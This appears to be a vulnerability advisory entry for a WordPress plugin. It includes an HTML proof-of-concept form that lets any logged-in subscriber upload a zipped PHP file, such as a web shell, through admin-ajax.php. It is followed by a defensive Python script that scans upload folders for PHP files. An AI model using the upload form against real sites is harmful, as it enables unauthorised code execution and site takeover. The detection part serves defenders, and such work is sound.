## https://sploitus.com/exploit?id=WPEX-ID:64BD22E2-EA38-4B6F-BE54-E81F9E77BDC2
Submit the following form as any authenticated user, such as a simple subscriber:
<html>
<body>
<form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="zip_upload"/>
Zipped PHP File
<input type="file" name="zipFile"/><br/><br/>
<input type="submit" value="Upload"/>
</form>
</body>
</html>
The extracted files will be in wp-content/uploads/YEAR/MONTH/, e.g. wp-content/uploads/2022/01/shell.php
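
A defender-side check for the outcome described above, as an added example that is not part of the original advisory: it walks a WordPress uploads directory and reports PHP-executable files inside the date-based YEAR/MONTH folders. The extension list, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions commonly mapped to the PHP handler (assumption: adjust this set
# to the web server's actual handler configuration).
PHP_EXTS = {".php", ".phtml", ".phar", ".php3", ".php4", ".php5", ".php7", ".pht"}
# WordPress date-based upload folders: uploads/YEAR/MONTH/ and anything below.
DATED_DIR = re.compile(r"^\d{4}/(0[1-9]|1[0-2])(/|$)")


def find_php_in_uploads(uploads_root):
    """Return sorted relative paths of PHP-executable files under YEAR/MONTH/."""
    hits = []
    for dirpath, _dirs, files in os.walk(uploads_root):
        rel_dir = os.path.relpath(dirpath, uploads_root).replace(os.sep, "/")
        if not DATED_DIR.match(rel_dir):
            continue  # only the dated folders, where extracted files land
        for name in files:
            # Check every dot-separated part so "shell.php.jpg" is reported too:
            # some handler configurations match on any extension in the name.
            parts = {"." + p.lower() for p in name.split(".")[1:]}
            if parts & PHP_EXTS:
                hits.append(f"{rel_dir}/{name}")
    return sorted(hits)


def build_sample_tree(root):
    """Constructed sample data: benign files plus two that should be flagged."""
    for rel in ("2022/01/photo.jpg", "2022/01/shell.php",
                "2022/02/a/x.PHTML.txt", "cache/index.php"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for hit in find_php_in_uploads(tmp):
            print("suspicious:", hit)
```

On a real site, pass the absolute path of wp-content/uploads to `find_php_in_uploads` and review each hit against known plugin files before removing anything.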